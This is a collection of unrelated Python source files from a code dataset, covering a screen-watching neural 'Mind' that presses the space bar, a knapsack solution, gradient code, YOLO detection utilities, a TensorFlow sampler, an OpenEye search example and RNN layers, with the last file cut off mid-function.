0.9\n self.screen_cur = None\n self.screen_prev = None\n self.iter_num = 0\n\n self.accumulation = np.ones_like(self.connections[sensory_count:-output_count, sensory_count:-output_count])\n self.accumulation *= 1 / (1 - self.acc_decay)\n self.up = np.zeros_like(self.firings[0, sensory_count:])\n self.upcount = 0\n self.down = np.zeros_like(self.firings[0, sensory_count:])\n self.downcount = 0\n self.sight = None\n self.sound = None\n\n def output(self, keyboard_to_press):\n print(self.firings[-1][-output_count:].mean(), \"Out\")\n # if self.firings[-1][-output_count:].mean() > 0.5:\n # keyboard_to_press.press(\" \")\n # if self.firings[-1][-output_count:].mean() > self.firings[:, -output_count:].mean():\n if self.firings[-1][-output_count:].mean () >= 0.5:\n keyboard_to_press.press(\" \")\n else:\n keyboard_to_press.release(\" \")\n\n\n def reward(self):\n thought = self.firings[:, sensory_count:-output_count]\n nov = np.abs(thought[-1] - thought[-10]).mean() / thought.sum() * 2E5\n print(\"novelty\", nov)\n # self.connections[:, self.firings[-1]] *= reward_amount * (1 + nov)\n # self.connections = self.connections.clip(-limits, limits)\n # alpha = 10 if int(nov) > 0 else -10\n self.learn(nov)\n\n\n def fire(self):\n if self.sight is not None:\n visual = self.sight.flatten()\n firings_next = ((self.firings[-1] @ self.connections) > threshold).astype(float)\n # firings_next[:len(visual)] = visual > visual.mean()\n firings_next[:len(visual)] = visual / visual.max()\n # print(firings_next)\n if audiosize > 0:\n firings_next[len(visual):audvis_count] = self.sound > self.sound.mean()\n if randomsize > 0:\n firings_next[audvis_count:sensory_count] = np.random.uniform(randomsize)\n self.firings[:-1] = self.firings[1:]\n self.firings[-1] = firings_next\n # if (int(time.time()) % 10 != 0):\n # if (int(time.time() / 10) % 2 == 0):\n # print(\"Action One\", int(time.time() - base_time), end=\" \")\n # self.up += firings_next[sensory_count:].astype(int)\n # s elf.upcount += 1\n # else:\n # print(\"Action Two\", int(time.time() - base_time), end=\" \")\n # self.down += firings_next[sensory_count:].astype(int)\n # self.downcount += 1\n # else:\n # print(\"Switch Now\", int(time.time() - base_time), end=\" \")\n # print(self.firings[-1][-output_count:], np.max(np.abs(self.down / self.downcount - self.up / self.upcount)) )\n\n # Weaken old connections over time\n def decay(self):\n print(\"ITERATION: \" + str(self.iter_num))\n if self.iter_num % 3000 == 0:\n #plt.close()\n plt.imshow(self.connections)\n plt.savefig(\"dinoboi_\" + str(self.iter_num) + \".png\")\n plt.show()\n plt.close()\n self.iter_num += 1\n self.connections *= decay\n\n # Identify how well it correlated\n def learn(self, alpha=1):\n # print(\"Alpha\", alpha)\n # thought = self.firings[:, sensory_count:-output_count]\n wow = (self.firings[-2][None, :] - (1 - self.firings[-1][:, None])) * self.plastic\n #plt.imshow(wow)\n #plt.show()\n # print(self.firings[-1])\n # print(self.firings[-2])\n # print(wow)\n self.accumulation += np.abs(wow[sensory_count:-output_count, sensory_count:-output_count]) \\\n * self.gamma * alpha\n self.accumulation *= self.acc_decay\n subplastic = self.plastic[sensory_count:-output_count, sensory_count:-output_count]\n synapse_strength = np.abs(self.connections)[sensory_count:-output_count, sensory_count:-output_count]\n updates = (self.accumulation <= 0.3/(1 - self.acc_decay)) * (synapse_strength >= np.sum(synapse_strength * subplastic) / subplastic.sum())\n subplastic[updates] = 0\n # print(\"Plastic\", np.mean(self.plastic))\n self.connections += self.connections * wow * self.gamma * alpha\n self.connections = self.connections.clip(-limits, limits)\n self.gamma *= self.lr_decay\n\n # def visualize(self):\n # for neuron in range(-100,-50):\n # for steps in range(1, 2):\n # maxer = (None, 0)\n # matrixer = np.linalg.matrix_power(self.connections, steps)[:pixels**2 * channels, neuron]\n # initimage = np.zeros((pixels, pixels, channels))\n # for count in range(4):\n # for _ in range(500):\n # print(\"---\")\n # image = (1 - 1 / np.power(2, count)) * initimage + 1 / np.power(2, count) * np.random.uniform(size=(pixels, pixels, channels))\n # firing = image.flatten() @ matrixer\n # if firing > maxer[1]:\n # maxer = (image, firing)\n # initimage = maxer[0]\n # plt.imshow(((maxer[0] * 255).clip(0, 255)).astype(int))\n # plt.title(str(steps)+\",\"+str(neuron))\n # plt.show()\n def visualize(self):\n for neuron in range(-100,-90):\n try:\n sumer_max = np.zeros((pixels, pixels, channels))\n sumer_min = np.zeros((pixels, pixels, channels))\n sumer_diff = np.zeros((pixels, pixels, channels))\n for _ in range(200):\n maxer = (-1, None)\n miner = (10000, None)\n initimage_max = np.zeros((pixels, pixels, channels))\n initimage_min = np.zeros((pixels, pixels, channels))\n for count in range(6):\n for _ in range(100):\n image_max = (1 - 1 / np.power(1.2, count)) * initimage_max + 1 / np.power(1.2, count) * np.random.uniform(size=(pixels, pixels, channels))\n image_min = (1 - 1 / np.power(1.2, count)) * initimage_min + 1 / np.power(1.2, count) * np.random.uniform(size=(pixels, pixels, channels))\n fire_max = np.zeros_like(self.firings[-1])\n fire_min = np.zeros_like(self.firings[-1])\n for c in range(3):\n # fire[:pixels ** 2 * channels] = (image > image.mean()).flatten()\n fire_max[:pixels ** 2 * channels] = image_max.flatten()\n fire_min[:pixels ** 2 * channels] = image_min.flatten()\n fire_max = ((fire_max @ self.connections) > threshold).astype(float)\n fire_min = ((fire_min @ self.connections) > threshold).astype(float)\n fire_max = fire_max @ self.connections\n fire_min = fire_min @ self.connections\n if fire_max[neuron] > maxer[0]:\n maxer = (fire_max[neuron], image_max)\n if fire_min[neuron] < miner[0]:\n miner = (fire_min[neuron], image_min)\n initimage_max = maxer[1]\n initimage_min = miner[1]\n # plt.imshow(((maxer[1] * 255).clip(0, 255)).astype(int))\n # plt.plot(self.neurons[neuron][0] * (pixels - 1), self.neurons[neuron][1] * (pixels - 1), 'bo')\n # plt.show()\n # plt.imshow(((miner[1] * 255).clip(0, 255)).astype(int))\n # plt.plot(self.neurons[neuron][0] * (pixels - 1), self.neurons[neuron][1] * (pixels - 1), 'bo')\n # plt.show()\n diff = maxer[1] - miner[1]\n sumer_diff += diff\n sumer_max += maxer[1]\n sumer_min += miner[1]\n # plt.imshow((diff - diff.min())/(diff.max() - diff.min()))\n # plt.plot(self.neurons[neuron][0] * (pixels - 1), self.neurons[neuron][1] * (pixels - 1), 'bo')\n # plt.title(str(neuron))\n # plt.show()\n print(\"----\")\n plt.imshow((sumer_max - sumer_max.min()) / (sumer_max.max() - sumer_max.min()))\n plt.plot(self.neurons[neuron][0] * pixels - 0.5, self.neurons[neuron][1] * pixels - 0.5, 'bo')\n plt.title(\"Max\" + str(neuron))\n plt.show()\n\n plt.imshow((sumer_min - sumer_min.min()) / (sumer_min.max() - sumer_min.min()))\n plt.plot(self.neurons[neuron][0] * pixels - 0.5, self.neurons[neuron][1] * pixels - 0.5, 'bo')\n plt.title(\"Min\" + str(neuron))\n plt.show()\n\n plt.imshow((sumer_diff - sumer_diff.min()) / (sumer_diff.max() - sumer_diff.min()))\n plt.plot(self.neurons[neuron][0] * pixels - 0.5, self.neurons[neuron][1] * pixels - 0.5, 'bo')\n plt.title(\"Diff\" + str(neuron))\n plt.show()\n except:\n pass\n\n def screenshot(self):\n sct = mss()\n im = sct.grab({\"top\":100 ,\"left\":0, \"width\":500, \"height\":230})\n rgb = Image.frombytes(\"RGB\", im.size, im.bgra, \"raw\", \"BGRX\")\n visual = rgb.resize(size=(pixels, pixels), resample=Image.BICUBIC)\n visual = np.array(visual)\n # plt.imshow(visual)\n # plt.show()\n return visual\n\n\n def audiovision(self, cam, mic=None):\n if audiosize > 0:\n p = pyaudio.PyAudio()\n mic = p.open(format=pyaudio.paInt16, channels=1, rate=44100, input=True, frames_per_buffer=audiosize)\n data = mic.read(audiosize)\n self.sound = np.fromstring(data, dtype=np.int16)\n else:\n self.sound = None\n\n if cam is not None:\n ret, frame = cam.read()\n base = cv2.resize(frame, dsize=(pixels, pixels), interpolation=cv2.INTER_AREA)\n self.sight = base.mean(-1)[:, :, None]\n else:\n self.sight = self.screenshot()\n self.screen_prev = self.screen_cur\n self.screen_cur = self.sight.copy()\n\n\ncount = 800\n#count = 3\ndims = 3\npercentile = 10\naudiosize = 0\nrandomsize = 50\n#randomsize = 0\nfiring_history = 50\npixels = 10\n#pixels = 1\nchannels = 1\naudvis_count = pixels ** 2 * channels + audiosize\nsensory_count = audvis_count + randomsize\n#output_count = 50\noutput_count = 10\ngamma = 0.0003\n#gamma = 0.002\nthreshold = 0.1\nlimits = 10\nreward_amount = 2.0\ndecay = 1 - 1E-8\nbase_time = 1549200000\nvideo_stream = False\nexp_decay = np.power(gamma, -np.arange(firing_history - 1))[None, :, None]\n\n\ndef main():\n if video_stream:\n cam = cv2.VideoCapture(0)\n cam.set(3, 36)\n cam.set(4, 64)\n else:\n cam = None\n count = 0\n n = 100000\n executor = ThreadPoolExecutor(max_workers=3)\n george = Mind(executor, gamma)\n keyboard_press = Controller()\n\n def input():\n george.audiovision(cam)\n\n def output(keyboard):\n george.output(keyboard)\n\n def processing(count):\n george.fire()\n # thought = george.firings[:, sensory_count:-output_count]\n thought = george.firings[:, :audvis_count]\n # nov = np.abs(thought[-1] - thought[-2]).mean() / thought.sum() * 2E5\n if george.screen_prev is not None:\n nov = np.abs(george.screen_cur - george.screen_prev).mean()\n else:\n nov = 1\n # nov = (george.sight.mean() / george.sight.max() - 0.98) * 40\n print(nov)\n if nov > 0.0:\n george.learn(1)\n else:\n george.learn(-2)\n george.decay()\n if (count % n == n - 1):\n george.visualize()\n\n def show():\n if george.sight is not None:\n plt.imshow(george.sight)\n plt.show()\n\n while True:\n #show()\n input()\n count += 1\n processing(count)\n output(keyboard_press)\n time.sleep(0.001)\n # if keyboard.is_pressed(\"space\"): #if key space is pressed.You can also use right,left,up,down and others like a,b,c,etc.\n # print(\"Rewarded\")\n # george.reward()\n\n\nmain()\n","sub_path":"baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":13916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"466639747","text":"import sys\ninput = sys.stdin.readline\nfrom heapq import heapify, heappop, heappush\n\nN, K = map(int,input().strip().split())\nheap = []\nfor _ in range(N):\n M, V = map(int, input().strip().split())\n heappush(heap, [M,V])\n\nbags = []\nfor _ in range(K):\n heappush(bags, int(input()))\n\nable = []\nresult = 0\n\nwhile bags :\n now_c = heappop(bags)\n\n while heap and heap[0][0] <= now_c :\n tmp_m, tmp_v = heappop(heap)\n heappush(able, -tmp_v)\n\n if able :\n result -= heappop(able)\n\nprint(result)\n\n\n\n\n#시간초과 ;;\n# N, K = map(int,input().strip().split())\n# heap = []\n# for _ in range(N):\n# M, V = map(int, input().strip().split())\n# if V == 0 :\n# continue\n# heap.append([-V,M])\n# heapify(heap)\n# bags = [ [int(input().strip()), False] for _ in range(K) ]\n# bags.sort()\n\n# count = 0\n# result = 0\n\n# while count < K and heap :\n# v, m = heappop(heap)\n\n# for i in range(K):\n# if bags[i][1] :\n# continue\n# if bags[i][0] >= m :\n# bags[i][1] = True\n# count += 1\n# result -= v\n# break\n\n# print(result)","sub_path":"2021_spring/2021_05_07/1202_JH.py","file_name":"1202_JH.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"210611764","text":"import numpy as np\n\ndef simple_gradient(x, y, theta):\n \"\"\"\n Computes a gradient vector from three non-empty numpy.ndarray, without any for-loop.\n The three arrays must have compatible dimensions. \n Args:\n x: has to be an numpy.ndarray, a vector of dimension m * 1. \n y: has to be an numpy.ndarray, a vector of dimension m * 1.\n theta: has to be an numpy.ndarray, a 2 * 1 vector. \n Returns:\n The gradient as a numpy.ndarray, a vector of dimension 2 * 1. \n None if x, y, or theta are empty numpy.ndarray.\n None if x, y and theta do not have compatible dimensions.\n \"\"\"\n if x.shape[0] * y.shape[0] * theta.shape[0] == 0:\n return None\n if x.shape[0] != y.shape[0] or theta.shape[0] != 2:\n return None\n\n x = add_intercept(x)\n\n result = [\n forumla(x, y, theta, 0),\n forumla(x, y, theta, 1)\n ]\n return result\n\ndef forumla(x, y, theta, j):\n length = x.shape[0]\n return theta[j] - (1/length) * sum(((x.dot(theta) - y) * x[:,j:][:,0]))\n\ndef add_intercept(x):\n if x.shape[0] == 0:\n return None\n\n if 1 == len(x.shape):\n x = x.reshape(x.shape[0], 1)\n\n return np.insert(x, 0, 1, axis=1)","sub_path":"day01/ex03/gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"294584528","text":"from __future__ import division\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport cv2\nimport numpy as np\nimport functools\nfrom bbox import bbox_iou_boxclass,DetectionBox\nimport math\n\ndef letterbox_image(img,inp_dim):\n '''\n img cv.imread()\n inp_dim networds input image weight\n 调整图像大小,保持宽高比一致,并用颜色填充左边区域(128,128,128)\n '''\n \n img_w ,img_h = img.shape[1],img.shape[0]\n w,h = inp_dim\n temp_min = min(w/img_w,h/img_h)\n new_w = int(img_w * temp_min)\n new_h = int(img_h * temp_min)\n \n resized_image = cv2.resize(img,(new_w,new_h),interpolation= cv2.INTER_CUBIC)\n canvas = np.full((inp_dim[1],inp_dim[0],3),128)\n canvas[(h-new_h)//2:(h-new_h)//2+new_h,(w-new_w)//2:(w-new_w)//2+new_w,:] = resized_image\n return canvas\n\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters())\n\ndef convert2cpu(matrix):\n if matrix.is_cuda:\n return torch.FloatTensor(matrix.size()).copy_(matrix)\n else:\n return matrix\n\ndef prep_image(img,inp_dim):\n \"\"\"\n Prepare image for inputting to the neural network\n Retun a torch Variable\n\n openccv loads an image as an numpy array BGR\n Pytorch's image input format is (Batches * Channels * Height * Width)\n \"\"\"\n orig_im = cv2.imread(img)\n dim = orig_im.shape[1], orig_im.shape[0]\n\n img = letterbox_image(orig_im, (inp_dim, inp_dim))\n img_ = img[:,:,::-1].transpose((2,0,1)).copy()\n img_ = torch.from_numpy(img_).float().div(255.0).unsqueeze(0)\n return img_, orig_im, dim\n\ndef prep_image_noletter(img,input_dim):\n orig_im = cv2.imread(img)\n img_w, img_h = orig_im.shape[1], orig_im.shape[0]\n\n resized_image = cv2.resize(orig_im, (input_dim,input_dim), interpolation=cv2.INTER_CUBIC)\n img_ = resized_image[:,:,::-1].transpose((2,0,1)).copy()\n img_ = torch.from_numpy(img_).float().div(255.0).unsqueeze(0)\n return img_, orig_im, (img_w,img_h)\n\n \n \n \n\ndef bbox_iou(box1,box2):\n\n \"\"\"\n Returns the IoU of two bounding boxes \n 向量形式计算 第一个Box 与后面所有的box 计算iou\n \"\"\" \n b1_x1,b1_y1,b1_x2,b1_y2 = box1[:,0],box1[:,1],box1[:,2],box1[:,3]\n b2_x1,b2_y1,b2_x2,b2_y2 = box2[:,0],box2[:,1],box2[:,2],box2[:,3]\n\n #获得相交领域的矩形\n inter_rect_x1 = torch.max(b1_x1,b2_x1)\n inter_rect_y1 = torch.max(b1_y1,b2_y1)\n inter_rect_x2 = torch.min(b1_x2,b2_x2)\n inter_rect_y2 = torch.min(b1_y2,b2_y2)\n \n\n #计算面积\n\n # Intersection area\n if torch.cuda.is_available():\n inter_area = torch.max(inter_rect_x2 - inter_rect_x1 + 1, torch.zeros(inter_rect_x2.shape).cuda()) * torch.max(\n inter_rect_y2 - inter_rect_y1 + 1, torch.zeros(inter_rect_x2.shape).cuda())\n else:\n inter_area = torch.max(inter_rect_x2 - inter_rect_x1 + 1, torch.zeros(inter_rect_x2.shape)) * torch.max(\n inter_rect_y2 - inter_rect_y1 + 1, torch.zeros(inter_rect_x2.shape))\n\n # Intersection area\n # inter_area = torch.clamp(inner_rect_x2 - inner_rect_x1 + 1, min=0) * torch.clamp(inner_rect_y2 - inner_rect_y1 + 1,min=0)\n b1_area = (b1_x2 - b1_x1 + 1)*(b1_y2 - b1_y1 + 1)\n b2_area = (b2_x2 - b2_x1 + 1)*(b2_y2 - b2_y1 + 1)\n\n iou = inter_area / (b1_area + b2_area - inter_area)\n \n return iou\n\n\n\n'''\nyolo 源码中的nms\nint nms_comparator(const void *pa, const void *pb)\n{\n detection a = *(detection *)pa;\n detection b = *(detection *)pb;\n float diff = 0;\n if(b.sort_class >= 0){\n diff = a.prob[b.sort_class] - b.prob[b.sort_class];\n } else {\n diff = a.objectness - b.objectness;\n }\n //diff < 0 则a < b \n if(diff < 0) return 1;\n else if(diff > 0) return -1;\n return 0;\n}\nqsort如果其第一个参数比第二个参数小,则返回一个小于0的值,反之则返回一个大于0的值,如果相等,则返 回0。\nvoid do_nms_sort(detection *dets, int total, int classes, float thresh)\n{\n int i, j, k;\n k = total-1;\n for(i = 0; i <= k; ++i){\n if(dets[i].objectness == 0){\n detection swap = dets[i];\n dets[i] = dets[k];\n dets[k] = swap;\n --k;\n --i;\n }\n }\n total = k+1;\n\n for(k = 0; k < classes; ++k){\n for(i = 0; i < total; ++i){\n dets[i].sort_class = k;\n }\n qsort(dets, total, sizeof(detection), nms_comparator);\n for(i = 0; i < total; ++i){\n if(dets[i].prob[k] == 0) continue;\n box a = dets[i].bbox;\n for(j = i+1; j < total; ++j){\n box b = dets[j].bbox;\n if (box_iou(a, b) > thresh){\n dets[j].prob[k] = 0;\n }\n }\n }\n }\n}\n'''\n\ndef detect_box_nms_sort(detectBoxs,thresh,num_class):\n num_boxes = len(detectBoxs)\n\n for class_index in range(num_class):\n for i in range(num_boxes):\n detectBoxs[i].sort_class = class_index\n #从大到小排列\n detectBoxs = sorted(detectBoxs,reverse=True)\n for i in range(num_boxes):\n if (detectBoxs[i].prob_list[class_index]==0):\n continue\n box_a = detectBoxs[i].box\n for j in range(i+1,num_boxes):\n if detectBoxs[j].objectness == 0:\n continue\n box_b = detectBoxs[j].box\n boxs_iou = bbox_iou_boxclass(box_a,box_b)\n if boxs_iou > thresh:\n detectBoxs[j].objectness = 0\n for k in range(num_class):\n detectBoxs[j].prob_list[k] = 0\n new_detectBoxes = []\n for detectbox in detectBoxs:\n if detectbox.objectness > thresh:\n new_detectBoxes.append(detectbox)\n return new_detectBoxes\n\ndef correct_yolo_boxes(detectBoxes,img_width,img_height,net_width,net_height):\n img_height = float(img_height)\n img_width = float(img_width)\n net_height = float(net_height)\n net_width = float(net_width)\n\n if net_width / img_width < net_height /img_height:\n new_width = net_width\n new_height = (img_height * net_width) / img_width\n else:\n new_width = (img_width * net_height) / img_height\n new_height = net_height\n x_old,x_slide = (new_width - new_width)/(2 * net_width),net_width/new_width\n y_old,y_slide = (net_height - new_height)/(2 * net_height),net_height/new_height\n for i in range(len(detectBoxes)):\n if detectBoxes[i].objectness==0:\n continue\n detectBoxes[i].box.x = (detectBoxes[i].box.x-x_old) * x_slide\n detectBoxes[i].box.y = (detectBoxes[i].box.y-y_old) * y_slide\n detectBoxes[i].box.w *= x_slide\n detectBoxes[i].box.h *= y_slide\n return detectBoxes\n\n\ndef draw_box_cv2(detectBoxes,oriImg,class_name_list):\n assert type(detectBoxes[0])==DetectionBox\n classes = len(class_name_list)\n\n img_width = oriImg.shape[1]\n img_height = oriImg.shape[0]\n\n for detectBox in detectBoxes:\n class_index = detectBox.find_class_index()\n if class_index == -1:\n continue\n box = detectBox.box\n classname = class_name_list[class_index]\n left = int((box.x- box.w/2.0) * img_width)\n top = int((box.y-box.h/2.0) * img_height)\n right = int((box.x + box.w/2.0) * img_width)\n bottom = int((box.y + box.h/2.0) * img_height)\n offset = class_index * 123457 % classes\n\n red = get_color(2, offset, classes)\n green = get_color(1, offset, classes)\n blue = get_color(0, offset, classes)\n\n cv2.rectangle(oriImg, (left,top),(right,bottom),(red,blue,green), 3)\n t_size = cv2.getTextSize(classname, cv2.FONT_HERSHEY_PLAIN, 1, 1)[0]\n cv2.putText(oriImg, classname, (left, top - t_size[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (red,blue,green), 1, cv2.LINE_AA)\n return oriImg\n\ndef get_color(c, x, max_val):\n colors = [[1, 0, 1], [0, 0, 1], [0, 1, 1], [0, 1, 0], [1, 1, 0], [1, 0, 0]]\n ratio = float(x)/max_val * 5\n i = int(math.floor(ratio))\n j = int(math.ceil(ratio))\n ratio = ratio - i\n r = (1-ratio) * colors[i][c] + ratio*colors[j][c]\n return int(r*255)\n\ndef load_one_image_cv2(imagefile,resize_dim):\n image_tensor,orig_ims,dim = prep_image(imagefile,resize_dim)\n return image_tensor,orig_ims,dim\n\ndef unique(tensor):\n #取label tensor 中的唯一值 ,用Numpy中的unique()api\n tensorNp = tensor.cpu().numpy()\n uniqueNp = np.unique(tensorNp)\n \n uniqueTensor = torch.from_numpy(uniqueNp)\n tensor_res = tensor.new(uniqueTensor.shape)\n tensor_res.copy_(uniqueTensor)\n return tensor_res\n \n \n \n \n \n\n ","sub_path":"lib/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"609791098","text":"\"\"\" Contains tensorflow-sampler class. \"\"\"\n\nfrom copy import copy\nimport tensorflow as tf\nfrom ...sampler import Sampler, _get_method_by_alias\n\n\n\nclass TfSampler(Sampler):\n \"\"\" Sampler based on a distribution from tf.distributions.\n\n Parameters\n ----------\n name : str\n name of a distribution (class from tf.distributions), or its alias.\n **kwargs\n additional keyword-args for distribution specification.\n E.g., `loc` for name='Normal'\n\n Attributes\n ----------\n name : str\n name of a distribution (class from tf.distributions).\n _params : dict\n dict of args for distribution specification.\n graph : tf.Graph\n graph in which sampling nodes are placed.\n sampler : tf.distributions\n instance of distributions' class.\n sess : tf.Session\n session used for running sample-tensor.\n \"\"\"\n def __init__(self, name, **kwargs):\n super().__init__(name, **kwargs)\n name = _get_method_by_alias(name, 'tf', tf.distributions)\n self.name = name\n self._params = copy(kwargs)\n self.graph = tf.Graph()\n with self.graph.as_default():\n config = tf.ConfigProto(device_count={'GPU':0})\n self.sess = tf.Session(config=config)\n _ = kwargs.pop('dim', None)\n self.sampler = getattr(tf.distributions, self.name)(**kwargs)\n\n def sample(self, size): # pylint: disable=method-hidden\n \"\"\" Sampling method of ``TfSampler``.\n\n Generates random samples from distribution ``self.name``.\n\n Parameters\n ----------\n size : int\n the size of sample to be generated.\n\n Returns\n -------\n np.ndarray\n array of shape (size, Sampler's dimension).\n \"\"\"\n with self.graph.as_default():\n _sample = self.sampler.sample(size)\n\n sample = self.sess.run(_sample)\n\n if len(sample.shape) == 1: # pylint: disable=no-member\n sample = sample.reshape(-1, 1) # pylint: disable=no-member\n return sample\n","sub_path":"batchflow/models/tf/tf_sampler.py","file_name":"tf_sampler.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"44910879","text":"#!/usr/bin/env python\n# (C) 2017 OpenEye Scientific Software Inc. All rights reserved.\n#\n# TERMS FOR USE OF SAMPLE CODE The software below (\"Sample Code\") is\n# provided to current licensees or subscribers of OpenEye products or\n# SaaS offerings (each a \"Customer\").\n# Customer is hereby permitted to use, copy, and modify the Sample Code,\n# subject to these terms. OpenEye claims no rights to Customer's\n# modifications. Modification of Sample Code is at Customer's sole and\n# exclusive risk. Sample Code may require Customer to have a then\n# current license or subscription to the applicable OpenEye offering.\n# THE SAMPLE CODE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED. OPENEYE DISCLAIMS ALL WARRANTIES, INCLUDING, BUT\n# NOT LIMITED TO, WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\n# PARTICULAR PURPOSE AND NONINFRINGEMENT. In no event shall OpenEye be\n# liable for any damages or liability in connection with the Sample Code\n# or its use.\n\n# @ \nfrom __future__ import print_function\n\nfrom openeye import oechem\n\nqfile = oechem.oemolistream(\"query.mol\")\ntfile = oechem.oemolistream(\"targets.sdf\")\n\n# set the same aromaticity model for the query and the target file\n# @ \naromodel = oechem.OEIFlavor_Generic_OEAroModelMDL\nqflavor = qfile.GetFlavor(qfile.GetFormat())\nqfile.SetFlavor(qfile.GetFormat(), (qflavor | aromodel))\ntflavor = tfile.GetFlavor(tfile.GetFormat())\ntfile.SetFlavor(tfile.GetFormat(), (tflavor | aromodel))\n# @ \n\n# read MDL query and initialize the substructure search\nopts = oechem.OEMDLQueryOpts_Default | oechem.OEMDLQueryOpts_SuppressExplicitH\nqmol = oechem.OEQMol()\n\n# @ \noechem.OEReadMDLQueryFile(qfile, qmol, opts)\nss = oechem.OESubSearch(qmol)\n# @ \n\n# loop over target structures\ntindex = 1\nfor tmol in tfile.GetOEGraphMols():\n oechem.OEPrepareSearch(tmol, ss)\n if ss.SingleMatch(tmol):\n print(\"hit target =\", tindex)\n tindex += 1\n# @ \n","sub_path":"venv/Lib/site-packages/openeye/docexamples/oechem/MDLQuerySearchSingleMatch.py","file_name":"MDLQuerySearchSingleMatch.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"572461018","text":"import numpy as np\nfrom layers import Layer\nfrom utils.tools import *\nimport copy\n\n\"\"\"\nThis file defines layer types that are commonly used for recurrent neural networks.\n\"\"\"\n\nclass RNNCell(Layer):\n def __init__(self, in_features, units, name='rnn_cell', initializer=Guassian()):\n \"\"\"\n # Arguments\n in_features: int, the number of inputs features\n units: int, the number of hidden units\n initializer: Initializer class, to initialize weights\n \"\"\"\n super(RNNCell, self).__init__(name=name)\n self.trainable = True\n\n self.kernel = initializer.initialize((in_features, units))\n self.recurrent_kernel = initializer.initialize((units, units))\n self.bias = np.zeros(units)\n\n self.kernel_grad = np.zeros(self.kernel.shape)\n self.r_kernel_grad = np.zeros(self.recurrent_kernel.shape)\n self.b_grad = np.zeros(self.bias.shape)\n\n def forward(self, inputs):\n \"\"\"\n # Arguments\n inputs: [input numpy array with shape (batch, in_features), \n state numpy array with shape (batch, units)]\n\n # Returns\n outputs: numpy array with shape (batch, units)\n \"\"\"\n batch = len(inputs[0])\n inputs[0] @ self.kernel\n inputs[1] @ self.recurrent_kernel\n a_t = inputs[0] @ self.kernel + inputs[1] @ self.recurrent_kernel + np.repeat(self.bias.reshape((1, -1)), batch, axis=0)\n return np.tanh(a_t)\n\n def backward(self, in_grads, inputs):\n \"\"\"\n # Arguments\n in_grads: numpy array with shape (batch, units), gradients to outputs\n inputs: [input numpy array with shape (batch, in_features), \n state numpy array with shape (batch, units)], same with forward inputs\n\n # Returns\n out_grads: [gradients to input numpy array with shape (batch, in_features), \n gradients to state numpy array with shape (batch, units)]\n \"\"\"\n h_t = self.forward(inputs)\n d_a_t = (1 - np.square(h_t)) * in_grads\n d_a_t = np.nan_to_num(d_a_t)\n self.b_grad = np.sum(d_a_t, axis=0)\n self.kernel_grad = np.nan_to_num(inputs[0].T) @ d_a_t\n self.r_kernel_grad = np.nan_to_num(inputs[1].T) @ d_a_t\n out_grads_in = d_a_t @ self.kernel.T\n out_grads_h = d_a_t @ self.recurrent_kernel.T\n\n return [out_grads_in, out_grads_h]\n\n def update(self, params):\n \"\"\"Update parameters with new params\n \"\"\"\n for k,v in params.items():\n if '/kernel' in k:\n self.kernel = v\n elif '/recurrent_kernel' in k:\n self.recurrent_kernel = v\n elif '/bias' in k:\n self.bias = v\n \n def get_params(self, prefix):\n \"\"\"Return parameters and gradients\n \n # Arguments\n prefix: string, to contruct prefix of keys in the dictionary (usually is the layer-ith)\n\n # Returns\n params: dictionary, store parameters of this layer\n grads: dictionary, store gradients of this layer\n\n None: if not trainable\n \"\"\"\n if self.trainable:\n params = {\n prefix+':'+self.name+'/kernel': self.kernel,\n prefix+':'+self.name+'/recurrent_kernel': self.recurrent_kernel,\n prefix+':'+self.name+'/bias': self.bias\n }\n grads = {\n prefix+':'+self.name+'/kernel': self.kernel_grad,\n prefix+':'+self.name+'/recurrent_kernel': self.r_kernel_grad,\n prefix+':'+self.name+'/bias': self.b_grad\n }\n return params, grads\n else:\n return None\n\n\nclass RNN(Layer):\n def __init__(self, cell, h0=None, name='rnn'):\n \"\"\"\n # Arguments\n cell: instance of RNN Cell\n h0: default initial state, numpy array with shape (units,)\n \"\"\"\n super(RNN, self).__init__(name=name)\n self.trainable = True\n self.cell = cell\n if h0 is None:\n self.h0 = np.zeros_like(self.cell.bias)\n else:\n self.h0 = h0\n \n self.kernel = self.cell.kernel\n self.recurrent_kernel = self.cell.recurrent_kernel\n self.bias = self.cell.bias\n\n self.kernel_grad = np.zeros(self.kernel.shape)\n self.r_kernel_grad = np.zeros(self.recurrent_kernel.shape)\n self.b_grad = np.zeros(self.bias.shape)\n\n def forward(self, inputs):\n \"\"\"\n # Arguments\n inputs: input numpy array with shape (batch, time_steps, in_features), \n\n # Returns\n outputs: numpy array with shape (batch, time_steps, units)\n \"\"\"\n batch = inputs.shape[0]\n h_0 = self.h0\n if self.h0.size == self.cell.bias.size:\n h_0 = np.tile(self.h0, batch).reshape((batch, -1))\n\n inputs = inputs.transpose((1, 0, 2))\n outputs = np.empty((inputs.shape[0], inputs.shape[1], len(self.cell.bias)))\n \n h_t = h_0\n for t in range(0, len(inputs)):\n h_t = self.cell.forward([inputs[t], h_t])\n outputs[t] = h_t\n\n return outputs.transpose((1, 0, 2))\n\n def backward(self, in_grads, inputs):\n \"\"\"\n # Arguments\n in_grads: numpy array with shape (batch, time_steps, units), gradients to outputs\n inputs: numpy array with shape (batch, time_steps, in_features), same with forward inputs\n\n # Returns\n out_grads: numpy array with shape (batch, time_steps, in_features), gradients to inputs\n \"\"\"\n batch = inputs.shape[0]\n h_0 = self.h0\n if self.h0.size == self.cell.bias.size:\n h_0 = 